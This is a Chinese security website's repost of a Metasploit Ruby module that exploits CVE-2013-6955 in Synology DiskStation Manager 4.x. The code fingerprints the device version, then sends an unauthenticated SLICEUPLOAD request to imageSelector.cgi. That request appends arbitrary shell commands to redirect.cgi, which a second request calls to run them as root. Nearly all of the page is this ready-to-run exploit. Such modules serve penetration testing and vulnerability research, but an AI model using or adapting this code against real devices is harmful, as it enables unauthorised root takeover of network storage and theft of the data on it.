首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Synology DiskStation Manager SLICEUPLOAD Remote Command Execution
来源:metasploit.com 作者:Wulftange 发布时间:2013-12-24  
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
                        &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
        versions 4.x, which allows the execution of arbitrary commands under root
        privileges.
        The vulnerability is located in /webman/imageSelector.cgi, which allows to append
        arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
        can be triggered by an unauthenticated user with a specially crafted HTTP request.
        This is exploited by this module to append the given commands to /redirect.cgi,
        which is a regular shell script file, and can be invoked with another HTTP request.
        Synology reported that the vulnerability has been fixed with versions 4.0-2259,
        4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
      },
      'Author'         =>
        [
          'Markus Wulftange' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-6955' ],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 0x31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Oct 31 2013'
    ))

    register_options(
      [
        Opt::RPORT(5000)
      ], self.class)
  end

  def check
    print_status("#{peer} - Trying to detect installed version")

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri('webman', 'info.cgi'),
      'vars_get' => { 'host' => ''}
    })

    if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
      version = "#{$~[:major]}.#{$~[:minor]}"
      build = $~[:build]
      model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
      model = "DS#{model}" unless model =~ /^[A-Z]/
    else
      print_status("#{peer} - Detection failed")
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")

    case version
    when '4.0'
      return Exploit::CheckCode::Vulnerable if build < '2259'
    when '4.1'
      return Exploit::CheckCode::Vulnerable
    when '4.2'
      return Exploit::CheckCode::Vulnerable if build < '3243'
    when '4.3'
      return Exploit::CheckCode::Vulnerable if build < '3810'
      return Exploit::CheckCode::Detected if build == '3810'
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    cmds = [
      # sed is used to restore the redirect.cgi
      "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
      payload.encoded
    ].join("\n")

    mime_msg = Rex::MIME::Message.new
    mime_msg.add_part('login', nil, nil, 'form-data; name="source"')
    mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')

    # unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
    # so we use a placeholder and replace it later
    cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
    mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
                      'form-data; name="foo"; filename="bar"')

    post_body = mime_msg.to_s
    post_body.strip!
    post_body.sub!(cmd_placeholder, cmds)

    # fix multipart encoding
    post_body.gsub!(/\r\n(--#{mime_msg.bound})/, '  \\1')

    # send request to append shell commands
    print_status("#{peer} - Injecting the payload...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri('webman', 'imageSelector.cgi'),
      'ctype'   => "multipart/form-data; boundary=#{mime_msg.bound}",
      'headers' => {
        'X-TYPE-NAME' => 'SLICEUPLOAD',
        'X-TMP-FILE'  => '/usr/syno/synoman/redirect.cgi'
      },
      'data'    => post_body
    })

    unless res and res.code == 200 and res.body.include?('error_noprivilege')
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
    end

    # send request to invoke the injected shell commands
    print_status("#{peer} - Executing the payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('redirect.cgi'),
    })

    # Read command output if cmd/unix/generic payload was used
    if datastore['CMD']
      unless res and res.code == 200
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
      end

      print_good("#{peer} - Command successfully executed")
      print_line(res.body)
    end
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenSIS 'modname' PHP Code Exe
·Red Hat CloudForms Management
·Zimbra Collaboration Server LF
·Easy Karaoke Player 3.3.31 Int
·HP SiteScope issueSiebelCmd Re
·RealNetworks RealPlayer 16.0.3
·Firefox 15.0.1 Code Execution
·Huawei Technologies du Mobile
·Easy Karaokay Player 3.3.31 (.
·RealNetworks RealPlayer Versio
·Internet Download Manager 6.17
·Windows Live Movie Maker 2011
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved